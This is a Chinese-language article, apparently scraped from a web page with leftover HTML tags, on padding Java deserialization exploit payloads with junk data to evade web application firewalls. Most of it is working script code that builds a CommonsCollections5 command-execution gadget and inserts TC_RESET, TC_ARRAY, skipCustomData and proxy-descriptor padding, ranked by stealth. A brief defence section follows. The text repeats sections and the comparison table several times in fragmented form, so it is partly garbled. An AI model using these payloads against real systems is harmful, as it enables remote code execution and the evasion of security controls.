Java序列化脏数据填充技术研究<\/h1>

1. 脏数据概念与作用<\/h2>
脏数据<\/strong>是指在Java序列化payload中插入的无意义或干扰性数据，其主要目的是绕过Web应用防火墙(WAF)的检测机制。<\/p>

为什么需要脏数据：<\/h3>

绕过WAF检查<\/strong>：WAF可能通过以下方式检测payload：

检查aced<\/code>魔术头<\/li>
查找关键字符串或特征信息<\/li>
分析特定类名<\/li> <\/ul> <\/li>
利用WAF性能限制<\/strong>：过大的请求体可能导致分段传输<\/li> 重组大包可能因性能问题被放弃分析<\/li> 超时可能导致只检查前几个TCP报文<\/li> <\/ul> <\/li> <\/ul> 2. Java序列化结构分析<\/h2> Java序列化数据是格式化数据，不能随意插入脏数据，需要找到合法的插入点：<\/p> 可能的插入点：<\/h3> 循环跳过机制<\/strong>：如do{b = reader.ReadByte()}while(b == 0x00)<\/code><\/li> 递归解析<\/strong>：前面可塞任意数据，只要最后一次反序列化成功<\/li> 特定标记处理<\/strong>：如TC_RESET<\/code>、TC_ARRAY<\/code>等<\/li> <\/ol> 3. 脏数据填充技术详解<\/h2> 3.1 TC_RESET技术<\/h3> 原理<\/strong>：<\/p> ObjectInputStream.readObject0<\/code>方法开头会忽略所有TC_RESET<\/code>(0x79)标记<\/li> handleReset()<\/code>会清空handle表，序列化开始时清空无影响<\/li> <\/ul> 实现代码<\/strong>：<\/p> serIns = yso.GetCommonsCollections5JavaObject("open \/System\/Applications\/Calculator.app") payload = yso.ToBytes(serIns) dirtyData = "" for range 100{ dirtyData += "\x79" } res = string(payload[:4]) + dirtyData + string(payload[4:]) println(codec.EncodeBase64(res)) <\/code><\/pre> 特点<\/strong>：<\/p> 简单易用<\/li> 大量TC_RESET在aced流中特征明显<\/li> <\/ul> 3.2 TC_ARRAY技术<\/h3> 原理<\/strong>：<\/p> 在payload前添加数组头<\/li> gadget作为最后一个元素：[]Object{null,null,null,gadget}<\/code><\/li> <\/ul> 实现步骤<\/strong>：<\/p> 准备classDesc： \/\/ 生成Object[]序列化对象 <\/span><\/span><\/span><\/span>rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==<\/span> <\/span><\/span><\/code><\/pre><\/li> 处理handle table错乱问题：添加TC_EXCEPTION<\/code>(0x7b)标记清空handle表<\/li> <\/ul> <\/li> <\/ol> 完整实现<\/strong>：<\/p> objArrayIns = yso.GetJavaObjectFromBytes(codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==")) descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc) serIns = yso.GetCommonsCollections5JavaObject("open \/System\/Applications\/Calculator.app") payload = yso.ToBytes(serIns) dirtyData = "" dirtyData += "\x75" \/\/ TC_ARRAY dirtyData += string(descSer[4:]) \/\/ 去掉magic header dirtyData += "\x00\x00\x00\x02" \/\/ 数组长度是2 dirtyData += "\x7B" \/\/ TC_EXCEPTION res = string(payload[:4]) + dirtyData + string(payload[4:]) println(codec.EncodeBase64(res)) <\/code><\/pre> 特点<\/strong>：<\/p> 生成标准序列化流，兼容性好<\/li> 是推荐使用的方式<\/li> <\/ul> 3.3 skipCustomData技术<\/h3> 原理<\/strong>：<\/p> readNonProxyDesc<\/code>会解析classDesc后调用skipCustomData<\/code><\/li> skipCustomData<\/code>会跳过数据块不影响解析<\/li> <\/ul> 实现<\/strong>：<\/p> objArraySer = codec.DecodeBase64("rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwcA==") objArrayIns = yso.GetJavaObjectFromBytes(objArraySer) descSer = yso.ToBytes(objArrayIns.JavaSerializable.ClassDesc) serIns = yso.GetCommonsCollections5JavaObject("open \/System\/Applications\/Calculator.app") payload = yso.ToBytes(serIns) dirtyData = "" dirtyData += string(descSer[4:-2]) \/\/ 去掉magic header、super class和block end dirtyData += "\x77" \/\/ TC_BLOCKDATA dirtyData += "\x05" \/\/ 数据块大小 dirtyData += string([]byte{1,2,3,4,5}) \/\/ 脏数据 dirtyData += "\x7b" \/\/ TC_EXCEPTION res = string(payload[:5]) + dirtyData + string(payload[4:]) println(codec.EncodeBase64(res)) <\/code><\/pre> 高级技巧<\/strong>：<\/p> 可以在类名中塞脏数据： objArrayIns.JavaSerializable.ClassDesc.Detail.ClassName=str.RandStr(10000) <\/code><\/pre> <\/li> <\/ul> 3.4 TC_PROXYCLASSDESC技术<\/h3> 原理<\/strong>：<\/p> 为gadget添加代理头<\/li> 代理头可以无限添加接口名<\/li> <\/ul> 实现<\/strong>：<\/p> serIns = yso.GetCommonsCollections5JavaObject("open \/System\/Applications\/Calculator.app") payload = yso.ToBytes(serIns) newPayload = "" newPayload += string(payload[:5]) \/\/ aced和TC_OBJECT newPayload += string("\x7d") \/\/ TC_PROXYCLASSDESC newPayload += string("\x00\x00\x00\x01") \/\/ 1个interface newPayload += string("\x00\x02") \/\/ 长度是2 newPayload += "aa" \/\/ 接口名 newPayload += "\x7b" \/\/ TC_EXCEPTION newPayload += string(payload[4:]) \/\/ classData println(codec.EncodeBase64(newPayload)) <\/code><\/pre> 4. Handle Table问题解决方案<\/h2> 在填充脏数据时常见handle table错乱问题，解决方案：<\/p> 使用TC_EXCEPTION(0x7b)<\/strong>：<\/p> 会抛出异常但能执行payload<\/li> 控制台输出不美观<\/li> <\/ul> <\/li> 重新生成所有引用值<\/strong>：<\/p> 更彻底但实现复杂<\/li> <\/ul> <\/li> 将所有引用改为实例<\/strong>：<\/p> 避免引用问题<\/li> <\/ul> <\/li> 使用Java自动生成序列化流<\/strong>：<\/p> 最可靠但需要Java环境<\/li> <\/ul> <\/li> <\/ol> 5. 技术对比与推荐<\/h2> 技术<\/th> 复杂度<\/th> 兼容性<\/th> 隐蔽性<\/th> 推荐度<\/th> <\/tr> <\/thead> TC_RESET<\/td> 低<\/td> 高<\/td> 低<\/td> ★★☆☆☆<\/td> <\/tr> TC_ARRAY<\/td> 中<\/td> 高<\/td> 中<\/td> ★★★★☆<\/td> <\/tr> skipCustomData<\/td> 高<\/td> 中<\/td> 高<\/td> ★★★☆☆<\/td> <\/tr> TC_PROXYCLASSDESC<\/td> 中<\/td> 中<\/td> 高<\/td> ★★★☆☆<\/td> <\/tr> <\/tbody> <\/table> 推荐方案<\/strong>：TC_ARRAY方式，因其生成的payload是标准序列化流，兼容性最好。<\/p> 6. 防御建议<\/h2> 针对脏数据填充攻击的防御措施：<\/p> 深度解析<\/strong>：完整解析整个序列化流而非仅检查开头<\/li> 类名白名单<\/strong>：限制可反序列化的类<\/li> 大小限制<\/strong>：限制反序列化数据大小<\/li> JEP 290<\/strong>：使用Java内置的序列化过滤器<\/li> <\/ol> 7. 参考资源<\/h2> Java反序列化数据绕WAF新姿势的补充<\/a><\/li> <\/ul>

技术<\/th>	复杂度<\/th>	兼容性<\/th>	隐蔽性<\/th>	推荐度<\/th> <\/tr> <\/thead>
TC_RESET<\/td>	低<\/td>	高<\/td>	低<\/td>	★★☆☆☆<\/td> <\/tr>
TC_ARRAY<\/td>	中<\/td>	高<\/td>	中<\/td>	★★★★☆<\/td> <\/tr>
skipCustomData<\/td>	高<\/td>	中<\/td>	高<\/td>	★★★☆☆<\/td> <\/tr>
TC_PROXYCLASSDESC<\/td>	中<\/td>	中<\/td>	高<\/td>	★★★☆☆<\/td> <\/tr> <\/tbody> <\/table> 推荐方案<\/strong>：TC_ARRAY方式，因其生成的payload是标准序列化流，兼容性最好。<\/p> 6. 防御建议<\/h2> 针对脏数据填充攻击的防御措施：<\/p> 深度解析<\/strong>：完整解析整个序列化流而非仅检查开头<\/li> 类名白名单<\/strong>：限制可反序列化的类<\/li> 大小限制<\/strong>：限制反序列化数据大小<\/li> JEP 290<\/strong>：使用Java内置的序列化过滤器<\/li> <\/ol> 7. 参考资源<\/h2> Java反序列化数据绕WAF新姿势的补充<\/a><\/li> <\/ul>

Java序列化脏数据填充技术研究<\/h1>

1. 脏数据概念与作用<\/h2> 脏数据<\/strong>是指在Java序列化payload中插入的无意义或干扰性数据，其主要目的是绕过Web应用防火墙(WAF)的检测机制。<\/p>

2. Java序列化结构分析<\/h2> Java序列化数据是格式化数据，不能随意插入脏数据，需要找到合法的插入点：<\/p>

3. 脏数据填充技术详解<\/h2>

7. 参考资源<\/h2> Java反序列化数据绕WAF新姿势的补充<\/a><\/li> <\/ul>

1. 脏数据概念与作用<\/h2>
脏数据<\/strong>是指在Java序列化payload中插入的无意义或干扰性数据，其主要目的是绕过Web应用防火墙(WAF)的检测机制。<\/p>

2. Java序列化结构分析<\/h2>
Java序列化数据是格式化数据，不能随意插入脏数据，需要找到合法的插入点：<\/p>

7. 参考资源<\/h2>

Java反序列化数据绕WAF新姿势的补充<\/a><\/li> <\/ul>